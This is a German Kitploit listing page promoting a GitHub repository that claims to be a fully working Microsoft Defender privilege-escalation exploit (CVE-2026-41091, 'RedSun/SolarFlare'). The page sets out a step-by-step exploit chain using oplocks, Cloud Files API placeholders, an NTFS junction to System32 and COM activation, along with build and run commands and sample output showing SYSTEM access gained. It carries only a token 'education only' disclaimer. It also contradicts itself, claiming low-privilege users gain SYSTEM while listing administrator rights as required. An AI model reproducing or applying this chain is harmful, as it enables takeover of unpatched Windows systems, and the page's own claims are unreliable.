Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41091-PoC-Exploit — CVE-2026-41091 RedSun | Microsoft-Defender-LPE-Exploit. Niedrigprivilegierte Benutzer erlangen NT AUTHORITY\SYSTEM 🔥 über Cloud Files API + NTFS-Junction-Tricks. Zwingt Defender, schädliche Payloads mit SYSTEM-Rechten nach System32 zu schreiben. ⚠️ Aktiv in freier Wildbahn ausgenutzt. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. 🛡️ Nur zu Bildungszwecken (PoC). | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-41091-poc-exploit
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationLernen & BildungPayload-EntwicklungBinary-Exploitation
GitHubtc4dy/cve-2026-41091-poc-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

CVE-2026-41091-PoC-Exploit

Repository anzeigen
3vor 1 MonatNoch nicht geprüft

CVE-2026-41091 RedSun | Microsoft-Defender-LPE-Exploit. Niedrigprivilegierte Benutzer erlangen NT AUTHORITY\SYSTEM 🔥 über Cloud Files API + NTFS-Junction-Tricks. Zwingt Defender, schädliche Payloads mit SYSTEM-Rechten nach System32 zu schreiben. ⚠️ Aktiv in freier Wildbahn ausgenutzt. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. 🛡️ Nur zu Bildungszwecken (PoC).

Teilen

SolarFlare

☀️ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender LPE-Exploit

C++ Windows License CVSS CISA KEV

Microsoft Defender Link-Following-Schwachstelle - Lokale Rechteausweitung auf NT AUTHORITY\SYSTEM

Die Schwachstelle ist als "RedSun" bekannt 🎯, "SolarFlare" ist der Name, den ich meinem Exploit gegeben habe. ✅

📌 Übersicht

Dieses Repository enthält einen vollständig funktionsfähigen Proof of Concept (PoC)-Exploit für CVE-2026-41091, eine kritische lokale Rechteausweitungs-Schwachstelle in Microsoft Defender (Microsoft Malware Protection Engine). Durch die Ausnutzung einer fehlerhaften Linkauflösung (CWE-59) kann ein authentifizierter Angreifer mit niedrigen Rechten NT AUTHORITY\SYSTEM-Berechtigungen erlangen.

Die Schwachstelle, auch bekannt als "RedSun" oder "SolarFlare", ermöglicht es Angreifern, Microsoft Defender dazu zu bringen, mithilfe der Cloud Files API (CfAPI) und NTFS-Junction-Points beliebige Dateien mit SYSTEM-Berechtigungen an geschützte Systemspeicherorte zu schreiben.

Hinweis: Dieses Repository enthält zwei Versionen:

  • basic_poc.cpp - Einfache Algorithmus-Demonstration (zu Lehrzwecken)
  • full_poc.cpp - Vollständiger funktionsfähiger Exploit mit allen Funktionen

🔥 Hauptfunktionen

🎯 Schwachstellendetails

📦 Betroffene Produkte

ProduktBetroffene VersionenBehobene Versionen
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

🔬 Exploit-Kette

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE EXPLOIT CHAIN                                                    │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│ 1. Create Working Directory                                                 │
│    └─> %TEMP%\SF-XXXX\                                                      │
│                                                                              │
│ 2. Trigger Defender with EICAR                                              │
│    └─> Write reversed EICAR to bait file                                    │
│                                                                              │
│ 3. Wait for VSS Snapshot                                                    │
│    └─> Detect Volume Shadow Copy creation                                   │
│                                                                              │
│ 4. Create First Batch Oplock                                                │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on bait file                              │
│                                                                              │
│ 5. Wait for Oplock Break                                                    │
│    └─> Acquire exclusive access                                             │
│                                                                              │
│ 6. Rename Directory                                                         │
│    └─> Move original directory to .tmp                                      │
│                                                                              │
│ 7. Register Cloud Sync Root                                                 │
│    └─> CfRegisterSyncRoot with Cloud Files API                              │
│                                                                              │
│ 8. Create Cloud Placeholder                                                 │
│    └─> CfCreatePlaceholders for bait file                                   │
│                                                                              │
│ 9. Create Second Batch Oplock                                               │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder                      │
│                                                                              │
│ 10. Wait for Second Oplock Break                                            │
│     └─> Acquire exclusive access                                            │
│                                                                              │
│ 11. Rename Cloud Directory                                                  │
│     └─> Move cloud directory to .cloud.tmp                                  │
│                                                                              │
│ 12. Create NTFS Junction to System32                                        │
│     └─> Redirect to C:\Windows\System32                                     │
│                                                                              │
│ 13. Copy Payload to System32                                                │
│     └─> Copy bait file to System32 as TieringEngineService.exe              │
│                                                                              │
│ 14. Activate Service as SYSTEM                                              │
│     └─> CoCreateInstance(StorageTiersManagement)                            │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

📦 Installation

Voraussetzungen

  • Windows 10/11 oder Windows Server 2019/2022
  • Visual Studio 2019/2022 mit C++-Tools
  • Administratorrechte (für die Ausführung)

Erstellen

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Build using Visual Studio Developer Command Prompt
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Or build basic version
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

🛠️ Verwendung

Vollständiger Exploit (Rechteausweitung auf SYSTEM)

root@kitploit:~
full_poc.exe

Basisalgorithmus-Demonstration

root@kitploit:~
basic_poc.exe

📋 Beispielausgabe

Ausgabe des vollständigen Exploits

root@kitploit:~
CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM

[+] SYSTEM access obtained!

Ausgabe des Basis-PoC

root@kitploit:~
CVE-2026-41091 Basic PoC
========================================
  Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe

[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.

🔧 Kompilieranleitung

Mit Visual Studio

  1. Öffnen Sie die Developer-Eingabeaufforderung für VS 2022
  2. Navigieren Sie zum Exploit-Verzeichnis
  3. Führen Sie Folgendes aus:
root@kitploit:~
# Full exploit
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Basic PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

Mit CMake

root@kitploit:~
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ Anforderungen und Einschränkungen

🔗 Verwandte Exploits

Schauen Sie sich meine anderen Exploit-Repositories an:

  • CVE-2026-24061-PoC-Exploit - GNU-inetutils-telnetd-Authentifizierungsumgehung
  • CVE-2026-41940-PoC-Exploit - cPanel/WHM-Authentifizierungsumgehungs-Exploit
  • CVE-2026-0073-PoC-Exploit - Android-ADB-Wireless-Debugging-Authentifizierungsumgehung
Tool herunterladen
KategorieFunktionen
Ausnutzung✅ Lokale Rechteausweitung auf SYSTEM
✅ Cloud Files API (CfAPI) Integration
✅ Erstellung von Cloud-Platzhaltern
✅ NTFS-Junction-Umleitung
Techniken✅ Batch-Oplock-Missbrauch
✅ VSS-Snapshot-Erkennung
✅ EICAR-Trigger
✅ COM-Dienstaktivierung
Ziel✅ Microsoft Defender < 1.1.26040.8
✅ Windows 10/11
✅ Windows Server 2019/2022
Benutzerfreundlichkeit✅ Detaillierte Protokollierung
✅ Fehlerbehandlung
✅ Zufällige Verzeichnisnamen
✅ Automatische Bereinigung
AttributWert
CVE IDCVE-2026-41091
CVSS Score7.8 (Hoch)
CVSS VectorAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
AngriffsvektorLokal
Erforderliche RechteNiedrig
BenutzerinteraktionKeine
AuswirkungCodeausführung mit SYSTEM-Rechten
CISA KEV✅ Ja (aktiv in freier Wildbahn ausgenutzt)
Patch verfügbarMicrosoft Malware Protection Engine 1.1.26040.8
AnforderungDetails
BetriebssystemWindows 10/11, Server 2019/2022
BerechtigungenAdministrator (für die Ausführung)
DefenderMicrosoft Defender muss aktiviert sein
InternetErforderlich für VSS-Snapshot-Erkennung
PatchFunktioniert nur auf ungepatchten Systemen
ArchitekturNur x64